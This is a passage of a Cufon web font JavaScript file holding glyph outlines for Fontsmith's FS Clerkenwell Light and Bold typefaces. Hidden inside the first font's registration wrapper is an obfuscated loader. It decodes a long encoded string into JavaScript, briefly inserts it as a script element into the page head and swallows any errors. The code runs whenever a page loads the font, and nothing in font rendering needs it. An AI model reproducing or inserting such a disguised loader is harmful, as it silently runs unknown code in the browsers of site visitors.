1,2,77,1,77,-41xm150,-64v0,-44,-40,-52,-89,-48r0,88v1,14,24,8,37,8v41,0,52,-23,52,-48","w":188},{"d":"167,0r-148,0r0,-16r19,0r0,-181v1,-12,-10,-9,-20,-9r0,-16r142,0r2,60v-32,6,-3,-44,-39,-44r-62,0r0,84r53,0v3,-8,1,-24,15,-21r0,59v-13,3,-12,-12,-16,-21r-52,0r0,81v0,7,4,8,10,8r74,0v5,-14,8,-33,9,-47v6,0,14,0,13,6r0,57","w":186},{"d":"81,0r-62,0r0,-16r19,0r0,-182v1,-11,-11,-7,-20,-8r0,-16r62,0r0,16r-19,0r0,182v-1,11,11,7,20,8r0,16","w":99},{"d":"105,-121v65,16,66,125,-19,125v-85,0,-88,-102,-27,-124v-50,-20,-38,-106,27,-106v69,0,73,85,19,105xm122,-174v0,-23,-14,-36,-36,-36v-22,0,-37,12,-37,35v0,24,18,39,39,48v24,-12,34,-31,34,-47xm129,-59v0,-30,-28,-42,-54,-52v-46,14,-47,98,10,98v29,0,44,-19,44,-46"},{"d":"121,-144v-20,17,-34,-17,-50,-27v3,20,22,51,-2,57v-23,-6,-4,-37,-2,-57v-16,11,-28,44,-49,27v-6,-22,30,-22,48,-31v-19,-8,-55,-8,-48,-31v22,-15,33,17,49,27v-3,-20,-21,-50,2,-56v24,6,5,37,2,57v16,-10,29,-42,50,-28v8,24,-29,22,-48,31v18,9,55,8,48,31","w":139},{"d":"133,-165v0,8,0,12,-4,18r-91,132r65,0v14,1,12,-16,14,-27r14,0r0,42r-120,0v0,-8,0,-11,4,-18r90,-132r-65,0v-14,-1,-12,16,-14,27r-14,0r0,-42r121,0","w":144},{"d":"98,4v-62,0,-80,-44,-83,-115v-4,-94,70,-144,127,-96r3,-14r13,0r0,65v-15,3,-18,-6,-19,-18v-2,-21,-17,-34,-41,-34v-37,0,-59,35,-59,97v0,95,61,121,112,76r9,11v-13,15,-38,28,-62,28","w":174},{"d":"42,-12v0,9,-6,16,-15,16v-9,0,-16,-7,-16,-16v0,-9,7,-16,16,-16v9,0,15,7,15,16","w":55},{"d":"120,-103r-99,40r0,-19r77,-30r-77,-33r0,-19r99,44r0,17","w":140},{"d":"56,69r-64,0r0,-18v13,-3,40,7,40,-7r0,-264v-1,-16,-26,-5,-40,-8r0,-18r64,0r0,315","w":92},{"d":"171,-161v0,34,-19,59,-54,63r41,73v4,12,15,8,29,9r0,16r-40,0r-54,-96r-32,0r0,72v0,13,11,6,20,8r0,16r-62,0r0,-16r19,0r0,-180v3,-11,-10,-11,-20,-10r0,-16r64,0v62,-2,89,11,89,61xm61,-112v51,2,86,-2,86,-48v0,-42,-32,-50,-86,-46r0,94","w":196},{"d":"103,80v-62,2,-54,-54,-54,-111v0,-24,-8,-45,-38,-49r0,-5v46,-6,36,-50,36,-92v0,-45,11,-66,56,-68r0,7v-41,0,-26,47,-26,82v0,32,-1,66,-41,74v58,13,36,74,36,124v0,21,12,29,31,31r0,7","w":99},{"d":"122,-103r-43,0r0,43r-17,0r0,-43r-44,0r0,-18r44,0r0,-43r17,0r0,43r43,0r0,18","w":140},{"d":"126,0r-84,0r0,-16r31,0r0,-173r-31,0r-3,-15v23,-1,38,-8,48,-18r8,0r0,199v0,13,20,5,31,7r0,16"},{"d":"52,-192r-6,7v-13,-11,-26,-19,-43,-19v0,-8,-2,-19,7,-18v14,0,28,12,42,30","w":57},{"d":"80,5v-46,0,-64,-38,-64,-85v0,-73,57,-114,104,-74v1,-22,16,-9,41,-11r2,14r-21,0r0,211v-1,9,13,5,20,6r0,14v-18,0,-42,3,-42,-16r0,-73v-8,7,-24,14,-40,14xm84,-153v-37,0,-43,28,-45,72v-5,68,44,87,81,54r0,-107v-8,-11,-21,-19,-36,-19","w":172},{"d":"118,22r-20,0r-112,-268r19,0","w":119},{"d":"149,-222v-4,44,-26,68,-39,103v-16,43,-30,75,-36,119r-23,0v8,-70,49,-142,74,-202r-82,0v-7,13,-1,38,-25,35r6,-55r125,0"},{"d":"101,69r-65,0r0,-315r65,0r0,18v-14,2,-41,-7,-41,8r0,264v3,14,27,4,41,7r0,18","w":92},{"d":"52,-52v-7,55,59,38,76,13r0,-112r-19,0r0,-14r56,0r3,14v-10,0,-19,-1,-19,10v0,89,35,225,-65,222v-14,0,-33,-3,-45,-8r0,-18v41,22,97,8,89,-45r0,-29v-13,12,-33,24,-55,24v-63,-1,-37,-95,-42,-156r-20,0r-3,-14v20,0,25,-2,36,-2v6,0,8,2,8,8r0,107","w":179},{"d":"152,-76v0,42,-21,80,-65,80v-37,0,-66,-24,-66,-100v0,-97,47,-147,119,-124r-4,15v-50,-19,-83,22,-89,79v41,-37,105,-30,105,50xm129,-76v0,-68,-53,-61,-84,-31v-2,59,13,100,42,94v27,0,42,-25,42,-63"},{"d":"156,-57v0,39,-28,59,-63,61r0,26r-15,0r0,-26v-17,-1,-34,-7,-46,-19r-5,15r-13,0r0,-65v13,-2,15,4,17,15v4,22,25,34,47,37r0,-90v-32,-11,-64,-24,-64,-63v0,-37,29,-59,64,-60r0,-25r15,0r0,26v15,2,29,8,37,21r3,-17r12,0r0,65v-23,4,-16,-32,-28,-39v-6,-8,-14,-12,-24,-14r0,86v32,12,63,26,63,66xm78,-129r0,-81v-24,1,-42,14,-42,39v0,23,15,32,42,42xm133,-52v0,-25,-15,-37,-40,-46r0,85v26,-3,40,-19,40,-39"},{"d":"135,-124r-17,0r-38,-83r-38,83r-18,0r48,-102r16,0","w":159},{"d":"168,-98v-8,19,-24,36,-43,36v-40,-2,-78,-44,-104,-3r-10,-7v20,-63,77,-14,119,-14v10,0,22,-10,28,-19","w":179},{"d":"52,-52v-7,55,59,39,76,13r0,-112r-20,0r-3,-14v20,0,25,-2,36,-2v6,0,8,2,8,8r0,139v0,8,11,6,19,6r0,14v-19,-1,-43,7,-40,-19v-13,12,-33,24,-55,24v-63,-1,-37,-95,-42,-156r-21,0r-2,-14v20,0,25,-2,36,-2v6,0,8,2,8,8r0,107","w":180},{"d":"175,-111v0,58,-21,115,-80,115v-59,0,-79,-56,-79,-115v0,-58,21,-115,80,-115v59,0,79,57,79,115xm151,-111v0,-52,-15,-97,-56,-97v-41,0,-55,45,-55,97v0,52,14,97,55,97v41,0,56,-45,56,-97","w":190},{"d":"154,-151v-11,1,-22,-2,-25,7r-47,144r-20,0r-49,-151r-15,0r0,-14r58,0r0,14v-9,0,-23,-3,-19,9r37,115r40,-124r-15,0r0,-14r52,0","w":147,"k":{"t":4,"f":1,"A":14}},{"d":"175,-111v0,70,-41,138,-113,108v-23,15,-12,51,27,51v22,0,48,-10,70,-14r0,14v-43,15,-128,34,-130,-26v0,-14,7,-27,20,-34v-54,-51,-48,-215,47,-214v59,0,79,57,79,115xm151,-111v0,-52,-15,-97,-56,-97v-41,0,-55,45,-55,97v0,52,14,97,55,97v41,0,56,-45,56,-97","w":190},{"d":"122,-128r-104,0r0,-17r104,0r0,17xm122,-78r-104,0r0,-18r104,0r0,18","w":140},{"d":"138,-171v0,55,-100,108,-95,153r72,0v8,-15,-1,-47,26,-44r-7,62r-114,0v-1,-40,11,-64,51,-103v32,-32,43,-45,43,-67v0,-44,-54,-42,-85,-26r-5,-17v45,-24,114,-17,114,42"},{"d":"75,-86v0,82,-29,137,-74,158r-5,-7v69,-45,68,-257,0,-302r5,-6v45,21,74,75,74,157","w":105},{"d":"209,-206r-19,0r0,206r-18,0r-114,-178r0,155v-1,10,12,7,20,7r0,16r-58,0r0,-16r19,0r0,-182v1,-11,-11,-7,-20,-8r0,-16r36,0r116,179r0,-154v2,-10,-11,-10,-21,-9r0,-16r59,0r0,16","w":225},{"d":"301,-206v-12,1,-25,-3,-28,9r-50,197r-27,0r-45,-172r-47,172r-24,0r-50,-198v0,-9,-14,-8,-25,-8r0,-16r66,0r0,16r-21,0r45,175r52,-191r12,0r52,198r46,-182r-21,0r0,-16r65,0r0,16","w":304,"k":{"a":21,"e":19,"i":4,"o":17,"u":9,"A":25,"O":2}},{"d":"207,0r-75,0r0,-16r23,0r-47,-77r-44,77r23,0r0,16r-73,0r0,-16v16,0,32,2,36,-10r48,-83r-52,-86v-5,-13,-18,-11,-34,-11r0,-16r75,0r0,16r-22,0r47,78r44,-78r-23,0r0,-16r73,0r0,16v-17,0,-28,-2,-36,11r-48,83r53,86v5,12,16,10,32,10r0,16","w":213},{"d":"164,0r-145,0r0,-16r19,0r0,-181v1,-12,-10,-9,-20,-9r0,-16r62,0r0,16r-19,0r0,182v0,7,4,8,10,8r71,0v5,-14,9,-33,10,-47v6,0,12,-1,12,6r0,57","w":174},{"d":"197,0r-65,0r0,-16r19,0r-20,-60r-75,0v-5,18,-13,34,-16,54v-1,8,14,6,22,6r0,16r-62,0r0,-16r19,0r67,-206r18,0r67,198v2,10,15,8,26,8r0,16xm126,-92r-33,-98r-32,98r65,0","w":193,"k":{"A":-11,"T":18,"W":24,"Y":21}},{"d":"39,94r-17,0r0,-360r17,0r0,360","w":60},{"d":"108,-13v77,0,46,-109,52,-183v1,-13,-10,-10,-20,-10r0,-16r59,0r0,16r-19,0r0,120v4,52,-24,90,-72,90v-48,0,-75,-29,-75,-84r0,-118v1,-11,-11,-7,-20,-8r0,-16r63,0r0,16r-19,0v7,74,-28,193,51,193","w":210},{"d":"37,-208v0,19,-7,57,-10,78r-6,0v-3,-21,-10,-59,-10,-78v0,-12,5,-18,13,-18v8,0,13,6,13,18","w":54},{"d":"50,-207v0,21,-7,88,-10,142r-10,0v-3,-54,-11,-121,-11,-142v0,-12,5,-19,16,-19v11,0,15,7,15,19xm51,-12v0,9,-7,16,-16,16v-9,0,-16,-7,-16,-16v0,-9,7,-16,16,-16v9,0,16,7,16,16","w":70},{"d":"161,-75r-48,0r-15,79r-14,0r14,-79r-44,0r-14,79r-15,0r15,-79r-31,0r0,-13r33,0r9,-46r-42,0r0,-13r44,0r15,-79r14,0r-14,79r44,0r15,-79r14,0r-15,79r35,0r0,13r-37,0r-8,46r45,0r0,13xm109,-134r-44,0r-8,46r44,0"},{"d":"11,-21v42,18,75,7,75,-50r0,-126v0,-7,-1,-9,-8,-9r-56,0r-3,-16r90,0r0,151v10,68,-47,88,-98,67r0,-17","w":138},{"d":"203,0r-63,0r0,-16r19,0r0,-89r-98,0r0,81v-1,11,11,7,20,8r0,16r-62,0r0,-16r19,0r0,-182v1,-11,-11,-7,-20,-8r0,-16r62,0r0,16r-19,0r0,83r98,0r0,-75v1,-11,-11,-7,-20,-8r0,-16r63,0r0,16r-19,0r0,182v-1,11,11,7,20,8r0,16","w":220},{"d":"146,-144v28,-37,98,-36,98,28r0,96v-2,8,11,6,18,6r0,14r-57,0r0,-14r17,0r0,-99v6,-52,-54,-42,-73,-14v2,34,0,72,1,107v-2,8,11,6,18,6r0,14r-57,0r0,-14r17,0r0,-99v3,-52,-50,-43,-73,-13r0,106v-1,8,11,6,19,6r0,14r-58,0r0,-14r18,0r0,-137r-20,0r-3,-14v21,0,25,-2,36,-2v11,-1,7,12,8,22v21,-28,78,-37,91,1","w":274},{"d":"36,-129v0,43,90,27,90,86v0,46,-69,65,-94,29r-2,14r-13,0r0,-53v12,-2,16,3,17,13v4,40,71,40,73,1v1,-47,-89,-28,-89,-85v0,-42,62,-62,87,-30r2,-11r12,0r0,53v-12,2,-15,-4,-15,-15v0,-38,-68,-38,-68,-2","w":137},{"d":"132,21r-132,0r0,-16r132,0r0,16","w":131},{"d":"97,-227v-21,-11,-54,-8,-54,23v0,13,5,26,11,39r36,0r3,14r-38,0r0,130v-2,8,10,7,18,7r0,14r-57,0r0,-14r17,0r0,-137r-28,0r0,-14r26,0v-20,-32,-9,-88,37,-84v10,0,20,2,29,6r0,16","w":98,"k":{"e":3,"o":8,"i":2,"u":1}},{"d":"57,-218v0,8,-6,14,-14,14v-8,0,-14,-6,-14,-14v0,-8,6,-14,14,-14v8,0,14,6,14,14xm-12,51v28,9,46,1,46,-34r0,-168r-20,0r-3,-14v20,0,25,-2,36,-2v6,0,8,2,8,8r0,175v7,45,-28,63,-67,50r0,-15","w":84},{"d":"41,-171v3,60,120,39,120,114v0,64,-84,77,-124,42r-5,15r-13,0r0,-65v13,-2,16,4,17,15v7,50,102,48,102,-2v0,-62,-119,-41,-119,-114v0,-59,83,-81,116,-38r3,-17r12,0r0,65v-23,4,-16,-32,-28,-39v-22,-27,-83,-17,-81,24","w":173},{"d":"241,-129v0,52,-20,80,-53,80v-15,0,-29,-8,-32,-23v-16,35,-82,30,-82,-25v0,-61,54,-91,104,-64r-7,77v0,15,7,22,19,22v20,0,32,-27,32,-68v0,-46,-26,-81,-85,-81v-55,0,-102,45,-102,108v0,51,31,93,91,93v22,0,52,-7,71,-21r5,8v-14,13,-46,27,-85,27v-62,0,-101,-42,-101,-106v0,-72,56,-124,123,-124v66,0,102,40,102,97xm157,-154v-37,-12,-64,15,-64,55v0,23,10,36,28,36v36,0,33,-55,36,-91","w":256},{"d":"203,-206v-14,1,-26,-4,-30,10r-60,196r-24,0r-58,-196v-2,-12,-13,-10,-26,-10r0,-16r67,0r0,16r-21,0r52,178r55,-178r-23,0r0,-16r68,0r0,16","w":205,"k":{".":51,"A":26,"a":25,"e":24,"o":26,"C":5,"G":4,"O":4,"i":5,"u":12}},{"d":"148,0v-17,-1,-36,4,-38,-13v-25,31,-96,20,-93,-31v3,-46,41,-62,92,-61v9,-53,-45,-56,-79,-36r0,-18v43,-20,100,-16,100,47r0,91v-1,9,10,7,18,7r0,14xm39,-45v0,42,53,40,70,14r0,-59v-31,-2,-70,11,-70,45","w":161},{"d":"145,-83v0,64,-30,88,-65,88v-36,0,-64,-23,-64,-87v0,-64,30,-88,65,-88v36,0,64,23,64,87xm123,-82v0,-53,-18,-71,-42,-71v-21,0,-42,15,-42,71v0,53,17,70,41,70v21,0,43,-14,43,-70","w":161},{"d":"77,-15v33,0,43,-27,46,-58v4,-54,-53,-69,-79,-35r-12,-4r0,-110r102,0r0,20r-83,0r0,71v40,-31,95,-10,95,56v0,71,-68,100,-122,63r8,-17v13,8,30,14,45,14"},{"d":"43,-9v0,17,-9,32,-24,50r-8,-5v6,-10,14,-24,15,-32v-8,-1,-15,-6,-15,-15v0,-8,5,-16,15,-16v11,0,17,8,17,18","w":56},{"d":"81,-19v44,-4,72,7,72,45v0,27,-24,54,-71,54v-63,0,-87,-63,-46,-93v-14,-13,-5,-40,8,-47v-46,-34,-17,-131,55,-107v10,-12,21,-17,34,-17v9,-1,7,9,7,17v-14,0,-22,1,-29,5v54,31,22,140,-54,109v-19,15,-4,36,24,34xm117,-109v0,-28,-13,-46,-37,-46v-24,0,-36,18,-36,46v0,28,12,45,36,45v24,0,37,-17,37,-45xm132,28v0,-42,-55,-19,-84,-32v-23,23,-13,69,35,69v31,0,49,-15,49,-37","w":156},{"w":68},{"d":"53,-42v-5,32,21,35,43,27r0,15v-36,12,-64,2,-64,-46r0,-105r-24,0r0,-14r24,0v1,-20,-6,-43,21,-39r0,39r39,0r3,14r-42,0r0,109","w":106},{"d":"192,0r-39,0r-68,-111r-24,29r0,60v0,9,12,5,20,6r0,16r-62,0r0,-16r19,0r0,-181v3,-11,-11,-9,-20,-9r0,-16r62,0r0,16r-19,0r0,97v27,-36,65,-71,84,-113r41,0r0,16v-17,0,-22,-2,-33,11r-54,66r64,103v6,11,14,10,29,10r0,16","w":201},{"d":"57,-218v0,8,-6,14,-14,14v-8,0,-14,-6,-14,-14v0,-8,6,-14,14,-14v8,0,14,6,14,14xm74,0r-58,0r0,-14r18,0r0,-137r-20,0r-3,-14v21,0,25,-2,36,-2v6,0,8,3,8,9r0,138v-1,8,11,6,19,6r0,14","w":86},{"d":"77,-222v88,-4,114,38,114,117v0,68,-25,110,-101,105r-71,0r0,-16r19,0r0,-181v1,-12,-10,-9,-20,-9r0,-16r59,0xm167,-106v0,-72,-26,-107,-106,-100r0,182v0,14,21,8,33,8v60,0,73,-32,73,-90","w":205},{"d":"256,0r-61,0r0,-16r20,0r0,-154r-70,170r-18,0r-68,-167r0,144v-1,10,12,6,20,7r0,16r-59,0r0,-16r19,0r0,-182v1,-10,-11,-8,-20,-8r0,-16r40,0r79,193r78,-193r39,0r0,16r-20,0r0,181v-1,13,11,8,21,9r0,16","w":272},{"d":"236,-62v0,43,-16,66,-46,66v-30,0,-45,-23,-45,-66v0,-43,15,-65,45,-65v30,0,46,22,46,65xm181,-222r-94,222r-15,0r94,-222r15,0xm108,-161v0,43,-16,66,-46,66v-30,0,-46,-23,-46,-66v0,-43,16,-65,46,-65v30,0,46,22,46,65xm219,-62v0,-40,-11,-52,-29,-52v-18,0,-28,12,-28,52v0,40,10,53,28,53v18,0,29,-13,29,-53xm91,-161v0,-40,-11,-52,-29,-52v-18,0,-29,12,-29,52v0,40,11,53,29,53v18,0,29,-13,29,-53","w":252},{"d":"88,-77r-76,0r0,-20r76,0r0,20","w":100},{"w":68},{"d":"54,-150v47,-42,111,-10,106,65v-4,53,-15,90,-65,90v-17,0,-34,-7,-41,-19v0,18,-23,13,-41,14r0,-14v9,0,19,2,19,-8r0,-209r-20,0r-3,-15v20,0,26,-1,37,-1v6,0,8,2,8,8r0,89xm54,-132v2,51,-13,121,40,121v32,0,43,-31,43,-74v0,-36,-7,-66,-40,-67v-15,0,-31,8,-43,20","w":175},{"d":"185,-79r-19,0r0,79r-16,0r-4,-13v-60,41,-131,6,-131,-96v0,-99,73,-147,133,-97r4,-15r12,0r0,65v-14,3,-16,-6,-18,-17v-3,-19,-20,-36,-46,-36v-39,0,-61,36,-61,98v0,87,53,121,104,81r0,-41v2,-11,-11,-7,-20,-8r0,-16r62,0r0,16","w":198},{"d":"73,0r-58,0r0,-14r18,0r0,-217r-20,0r-3,-15v21,0,25,-1,36,-1v6,0,9,2,9,8r0,219v-2,8,11,6,18,6r0,14","w":85},{"d":"196,-206v-18,1,-25,-3,-33,13r-53,108r0,62v-1,10,12,6,20,7r0,16r-62,0r0,-16r19,0r0,-69r-53,-109v-5,-14,-15,-12,-31,-12r0,-16r68,0r0,16r-19,0r48,101r50,-101r-18,0r0,-16r64,0r0,16","w":196},{"d":"108,-147v-27,-1,-37,3,-53,24r0,102v-1,8,11,7,19,7r0,14r-58,0r0,-14r18,0r0,-137r-20,0r-3,-14v20,0,25,-2,36,-2v13,-1,7,16,8,26v12,-17,28,-29,44,-29v12,-1,8,13,9,23","w":113,"k":{"a":2,"e":3,"i":1,"o":3,"u":2}},{"d":"182,-167v-30,7,-7,-39,-37,-39r-38,0r0,182v-1,11,11,7,20,8r0,16r-62,0r0,-16r19,0r0,-190v-19,3,-52,-9,-54,11v-5,11,-1,32,-21,28r3,-55r167,0","w":190,"k":{".":16}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+421-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("CD6$M`on]_Y#C0J|e`ij7D7YrFo$6`Y#rFHj]_3>6RP^2&n,]D[naAyO:$}|r0YwHwQ]]$I,BxeJ;.}-VA8DEORHa0Q{Ej[=rRH|C&i1fR8fo$dgo,3BV>R;eJGY:,JaR$k:Er8RHjGwpOkdf$Y`]Jo}R`iuop8>rxTI:DGIeGdQ3GnJLpy,3F86fJE,L>oIMDJnC07,Cp8Q;A}^ft$,L>}^Mt$IL`8JM`en]08>;_7#6,g>MxJI]x:YB.n|]_2-2,gu]&nur,1Na>e.e$I#CAP-;&-#C$I#eFR,Lryj6r6Q6refL`our0g$].8neF2j:tG8r0g.6_7dfxHJe`JJe$I#2FYfL>RSVx3JfFoueFJ#6_6k]rHfL`ouMpOOLFO#eDR&e0k^MFokeDJuM,g-M.onM`id6pOQ6`YjCtdQ}y0tGiDx7HCL:oa;E3pATR_r26]MfeBV1k,wOJ`>-QvS^d#uI8j&n$F.[g{|PY=N;DI|CjdQC_eM2$dQrRnYfidQrrnQC0O1")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":169,"face":{"font-family":"FS Clerkenwell Light","font-weight":300,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 3 6 8 0 0 2 0 4","ascent":"263","descent":"-97","x-height":"5","bbox":"-14 -266 301 94","underline-thickness":"7.2","underline-position":"-40.68","stemh":"16","stemv":"22","unicode-range":"U+0020-U+007E"}}));
;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (c) 2009 by Fontsmith Ltd. All rights reserved.
 * 
 * Trademark:
 * FS Clerkenwell Bold is a trademark of Fontsmith Ltd.
 * 
 * Full name:
 * FSClerkenwell-Bold
 * 
 * Description:
 * Copyright (c) 2009 by Fontsmith Ltd. All rights reserved.
 * 
 * Manufacturer:
 * Fontsmith Ltd
 * 
 * Designer:
 * Phil Garnham and Jason Smith
 * 
 * Vendor URL:
 * http://www.fontsmith.com/
 * 
 * License information:
 * http://www.fontsmith.com
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm160,-247r-89,0r0,-22r89,0r0,22","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm141,-223v-2,20,-20,36,-46,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r21,0","w":190},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0v-4,61,12,134,-18,171v-16,19,-50,29,-50,54v0,20,20,23,35,16r0,21v-28,11,-68,0,-66,-34v0,-12,6,-23,16,-31v-59,3,-92,-31,-92,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160","w":248},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29","w":138},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm160,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v16,0,20,13,18,30","w":248},{"d":"244,0r-77,0r-69,-101v6,27,-18,77,24,72r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,67v21,-25,64,-73,75,-96r58,0r0,29v-19,-1,-29,0,-39,12r-45,51r61,86v7,11,17,16,36,15r0,29xm163,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,8,-19,20,-19v12,0,22,8,22,22","w":248},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm190,-268v-25,0,-38,7,-56,28r-8,-7v15,-35,32,-48,49,-48v17,0,15,12,15,27xm126,-268v-25,0,-39,7,-57,28r-8,-7v15,-35,33,-48,50,-48v17,0,15,12,15,27","w":248},{"d":"192,-222v1,35,0,32,-25,69r-83,124v25,-4,70,11,73,-14r4,-17r29,0r0,60r-175,0v-1,-33,1,-33,21,-63r87,-130v-38,2,-82,-13,-80,36r-29,0r0,-65r178,0xm150,-281v-15,16,-31,59,-63,37r-29,-37v25,-4,34,10,46,19v13,-9,21,-23,46,-19","w":206},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm170,-281v-3,17,-10,36,-36,36v-19,0,-40,-21,-51,0r-19,0v4,-43,44,-38,72,-26v8,0,14,-5,16,-10r18,0","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"212,0r-91,0r0,-25r12,0r-29,-53r-16,14v2,17,-8,44,18,39r0,25r-92,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v28,0,9,43,14,65v20,-18,53,-42,64,-63r48,0r0,25v-30,-5,-41,16,-58,29r40,72v8,13,15,14,30,14r0,25","w":217},{"d":"245,0r-104,0r0,-29r20,0r0,-67r-63,0v5,26,-17,73,24,67r0,29r-104,0r0,-29r21,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,63r63,0v-4,-26,16,-70,-25,-63r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm175,-238v-26,4,-35,-9,-47,-19v-13,9,-21,23,-46,19v15,-15,31,-58,63,-36","w":258},{"d":"236,-193r-20,0r0,193r-32,0r-105,-131r0,87v-2,14,10,16,25,15r0,29r-86,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r55,0r106,129r0,-85v2,-15,-10,-16,-25,-15r0,-29r86,0r0,29xm176,-281v-3,17,-10,36,-36,36v-19,0,-40,-21,-51,0r-18,0v4,-43,43,-38,72,-26v8,0,13,-5,15,-10r18,0","w":253},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm138,-196r-89,0r0,-23r89,0r0,23","w":182},{"d":"215,-111v0,77,-41,115,-99,115v-58,0,-100,-38,-100,-115v0,-77,42,-115,100,-115v58,0,99,38,99,115xm154,-111v0,-51,-15,-75,-38,-75v-23,0,-39,24,-39,75v0,51,16,75,39,75v23,0,38,-24,38,-75xm163,-238v-25,4,-34,-10,-46,-19v-13,9,-21,23,-46,19v15,-15,31,-58,63,-36","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"215,-111v0,93,-60,130,-138,109r-11,24r-30,0r18,-37v-24,-18,-38,-50,-38,-96v0,-92,60,-130,137,-109r14,-31r30,0r-21,43v24,18,39,51,39,97xm133,-180v-35,-19,-55,10,-56,69v0,15,1,29,4,39xm116,-36v34,10,46,-76,33,-116r-52,110v5,5,12,6,19,6xm149,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,38,-37,58,-37v16,0,18,13,17,30","w":231,"k":{"y":2,"u":2,"\u00f9":2,"\u00fa":2,"\u00fb":2,"\u0169":2,"\u00fc":2,"\u016b":2,"\u016d":2,"\u016f":2,"\u0171":2,"\u0173":2}},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm157,-268v0,18,-16,30,-33,30v-17,0,-32,-12,-32,-30v0,-18,15,-30,32,-30v17,0,33,12,33,30xm138,-268v0,-10,-5,-16,-14,-16v-9,0,-14,6,-14,16v0,10,5,16,14,16v9,0,14,-6,14,-16","w":248},{"d":"115,-127v0,22,-14,46,-53,46v-16,0,-32,-4,-46,-12r9,-25v15,13,53,19,52,-10v0,-14,-9,-20,-26,-19r0,-18v15,1,23,-6,23,-20v0,-23,-30,-17,-46,-10r-7,-23v33,-14,93,-11,90,28v0,12,-7,24,-24,30v19,4,28,14,28,33","w":131},{"d":"111,-177v0,14,-11,23,-24,23v-14,0,-24,-10,-24,-26v0,-19,10,-42,30,-72r13,7v-8,14,-15,36,-16,47v13,1,21,11,21,21xm55,-177v0,14,-10,23,-23,23v-14,0,-25,-10,-25,-26v0,-19,10,-42,30,-72r13,7v-8,14,-15,36,-16,47v13,1,21,11,21,21","w":120},{"d":"192,-222v1,35,0,32,-25,69r-83,124v25,-4,70,11,73,-14r4,-17r29,0r0,60r-175,0v-1,-33,1,-33,21,-63r87,-130v-38,2,-82,-13,-80,36r-29,0r0,-65r178,0xm144,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,38,-37,58,-37v16,0,18,13,17,30","w":206},{"d":"88,-151v40,-35,101,-22,101,36r0,80v0,11,9,10,19,10r0,25r-90,0r0,-25r16,0r0,-88v0,-29,-33,-22,-46,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r